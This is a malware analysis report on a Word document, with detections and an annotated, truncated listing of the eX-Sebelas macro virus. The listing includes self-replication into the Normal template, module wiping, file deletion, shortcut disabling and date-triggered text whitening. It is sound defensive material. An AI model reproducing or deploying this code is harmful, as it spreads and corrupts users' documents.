Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b0c15b86ff07efbf…

MALICIOUS

Office (OLE)

237.0 KB Created: 1980-01-11 06:22:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: f520b568a6fd2f7847ece6b5a57122d0 SHA-1: 0bcab673146e4a5689b51eeb6ae80261b028378c SHA-256: b0c15b86ff07efbf95541b9fabf3338033ce28026c97a0a8aaca4dfd1be7d416
260 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature 'Doc.Trojan.Astia-1'. It contains legacy WordBasic and VBA macros, including AutoOpen and Auto_Close, indicating a macro-based attack. The VBA module 'xSebelas' copies its own macro modules between the opened document and the Normal template, wipes other macro modules it finds in the destination, and issues 'Kill' commands against related files in a Word path, which is the behaviour of a self-replicating macro virus; it may also execute further malicious code, as suggested by its structure.

Heuristics 5

  • ClamAV: Doc.Trojan.Astia-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Astia-1
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11022 bytes
SHA-256: ba1db20ff1c6b5a64c6094ae96c9c237c2e910ca453b2834840b5e73d6dd9df7
Detection
ClamAV: Doc.Trojan.Astia-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
' Exported header of the document's ThisDocument class module. Only the
' attribute lines are present in the extract; no procedures follow for this
' module, so the malicious logic lives entirely in the xSebelas module below.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' Header of the xSebelas module (the self-replicating code). Module-level state
' shared by the procedures below: DokAktif and xSTujuan hold the active document
' and the copy destination chosen in xSebelasInit; xSmusnahkan is raised by
' AntiMakro when it removes a foreign module; ReSet selects deletion versus
' line-wiping in AntiMakro; DocCount, xSAda and xSAExec steer xSebelasInit's
' early exits. CekFAutoBat and CekFxBat are not referenced in the visible code.
Attribute VB_Name = "xSebelas"
Public DokAktif As Object, xSTujuan As Variant
Public xSAda As Boolean, xSmusnahkan As Boolean, ReSet As Boolean, xSAExec As Boolean, _
DocCount As Boolean, CekFAutoBat As Boolean, CekFxBat As Boolean
' Replication routine, invoked from AutoOpen further down the extract.
' Decides which macro container (Normal template or active document) is the
' source and which the destination, strips foreign modules from the destination
' (AntiMakro), copies its own modules across (Mcopy) and stamps the destination
' project with a marker so the work is not repeated. Analyst annotations only;
' the code is left exactly as extracted.
Function xSebelasInit()
Dim nMakro(1) As String
Dim TempNormal As Object
Dim xSSumber$
' Errors are ignored while deleting leftover files. DefaultFilePath(8) is
' presumably wdStartupPath (the Word startup folder) — TODO confirm constant.
On Error Resume Next
Kill Options.DefaultFilePath(8) & "\SNrml.src"
Kill Options.DefaultFilePath(8) & "\SNrml.dot"
Kill Options.DefaultFilePath(8) & "\win32s16.dll"
Kill Options.DefaultFilePath(8) & "\win32s16.dot"
' From here any runtime error jumps to 'selesai', which just ends the function.
On Error GoTo selesai
' The two modules that get copied: this module and the xPose form.
nMakro(0) = "xSebelas"
nMakro(1) = "xPose"
' MacroContainer is the template or document this code is currently running from.
xSSumber = MacroContainer
Set TempNormal = NormalTemplate
' Unless DocCount is set, the active document is the partner container; when
' DocCount is set and the source is not "winsspi.dot", Normal becomes the source.
If Not DocCount Then
Set DokAktif = ActiveDocument
ElseIf xSSumber <> "winsspi.dot" Then
xSSumber = TempNormal
End If
' Copy direction: Normal -> active document, active document -> Normal, or
' (when running from "winsspi.dot") from "\bios.vxd" under DefaultFilePath(8)
' into Normal. xSSumber ends as a path string, xSTujuan as the target object.
' Note the comparisons use "=" on objects, relying on their default property.
If xSSumber = TempNormal Then
xSSumber = TempNormal.FullName: Set xSTujuan = DokAktif
ElseIf xSSumber = DokAktif Then
xSSumber = DokAktif.FullName: Set xSTujuan = TempNormal
ElseIf xSSumber = "winsspi.dot" Then
Set xSTujuan = TempNormal
xSSumber = Options.DefaultFilePath(8) & "\bios.vxd"
End If
' Remove every macro module other than its own from the destination.
AntiMakro xSTujuan
With xSTujuan.VBProject
' Infection marker: a project whose Description is "xSebelas" with more than
' two components is treated as already done, unless AntiMakro just removed
' something (xSmusnahkan). Otherwise copy the modules and write the marker.
If Not (Not xSmusnahkan And .Description = "xSebelas" And .VBComponents.Count > 2) Then
    Mcopy xSSumber, xSTujuan, nMakro
    xSmusnahkan = False
    .Description = "xSebelas"
    ' When the destination is Normal: autosave every minute, reset the Tools
    ' command bar and disable Alt+F11 / Alt+F8 (the default shortcuts for the
    ' VB editor and the Macros dialog), making the macros harder to inspect.
    ' Error trapping is switched off right before the save.
    If xSTujuan = TempNormal Then
        Options.SaveInterval = 1
        CustomizationContext = TempNormal
        CommandBars("Tools").ReSet
        FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable
        FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable
        On Error GoTo 0
        xSTujuan.Save
    End If
Else
GoTo Aksi
End If
End With
' ReFresh is not defined in the visible part of the extract — TODO locate it.
If xSAda = True Then Exit Function
ReFresh
On Error Resume Next
Aksi:
If xSAExec = True Then Exit Function
Exit Function
selesai:
End Function
' Removes competing macro code from the VBA project of fSumber (the copy
' destination). Every component not named ThisDocument, NewMacros, xSebelas or
' xPose is either deleted via OrganizerDelete (when ReSet is set) or emptied by
' deleting all of its code lines. Sets xSmusnahkan so xSebelasInit re-copies
' its own modules afterwards. Object type 3 is presumably
' wdOrganizerObjectProjectItems (macro modules) — TODO confirm.
Sub AntiMakro(fSumber)
Dim nMakro As Object
For Each nMakro In fSumber.VBProject.VBComponents
    If nMakro.Name <> "ThisDocument" And nMakro.Name <> "NewMacros" _
    And nMakro.Name <> "xSebelas" And nMakro.Name <> "xPose" Then
        xSmusnahkan = True
        If ReSet Then
        Application.OrganizerDelete fSumber.FullName, nMakro.Name, 3
        Else
        nMakro.CodeModule.DeleteLines 1, nMakro.CodeModule.CountOfLines
        End If
    End If
Next nMakro
End Sub
' Displays Options.DefaultFilePath(4) in a message box. Not called from any
' visible procedure; looks like a leftover debugging helper of the author
' ("coba" is Indonesian for "try") — inferred from the name, not the code.
Sub Coba()
MsgBox Options.DefaultFilePath(4)
End Sub
' Copies each project item named in nMakro from the container at path fSumber
' into the document/template Dfile using Word's Organizer. This is the actual
' replication step; object type 3 is presumably wdOrganizerObjectProjectItems
' (macro modules) — TODO confirm.
Sub Mcopy(fSumber, Dfile, nMakro)
Dim xSNmakro
For Each xSNmakro In nMakro
Application.OrganizerCopy fSumber, Dfile.FullName, xSNmakro, 3
Next
End Sub
' Shows the xPose user form and then reschedules itself with Application.OnTime
' to run again 30 minutes later, so the form keeps reappearing while Word is
' open ("iklan" is Indonesian for "advertisement").
Sub Iklan()
xPose.Show
Application.OnTime When:=Now + TimeValue("00:30:00"), Name:="xSebelas.Iklan"
End Sub
' Replaces Word's built-in FileOpen command. Auto macros are disabled while the
' built-in open dialog (dialog 80, presumably wdDialogFileOpen — TODO confirm)
' is shown, then re-enabled; if the user did not cancel, AutoOpen is run by
' hand so the replication routine still fires for the newly opened document.
Sub FileOpen()
WordBasic.DisableAutoMacros True
If Dialogs(80).Show <> 0 Then
WordBasic.DisableAutoMacros False
AutoOpen
Else
WordBasic.DisableAutoMacros False
End If
End Sub
Sub AutoOpen()
On Error Resume Next
If Now > DateSerial(1999, 4, 11) And Day(Now) = 11 Then GoTo Putihkan
If Month(Now) = 11 Then GoTo CekTanggal1
If Month(Now) = 10 Then GoTo CekTanggal2
If Month(Now) = 2 Then GoTo CekTanggal3
GoTo EndCekTanggal
Putihkan:
Selection.WholeStory
    Selection.Font.ColorIndex = wdWhite
    Selection.MoveLeft Unit:=wdCharacter, Count:=1
    Selection.Font.ColorIndex = wdBlack
    Selection.TypeText Text:="Viva eX-SeBeLaS !"
GoTo EndCekTanggal
CekTanggal1:
If Day(Now) = 1 Then MsgBox "'Met ulang tahun Erry Delphiero !", vbInformation, "eX-Sebelas release 3.9"
GoTo EndCekTanggal
CekTanggal2:
If Day(Now) = 7 Then MsgBox "'Met ulang tahun DaNnY DeSPiRo !", vbInformation, "eX-Sebelas release 3.9"
GoTo EndCekTanggal
CekTanggal3:
If Day(Now) = 4 Then MsgBox "'Met ulang tahun Natalie Imbruglia !", vbInformation, "eX-Sebelas release 3.9"
EndCekTanggal:
Application.EnableCancelKey = wdCancelDisabled
xSebelasInit
If Documents.Count > 1 Then
    F
... (truncated)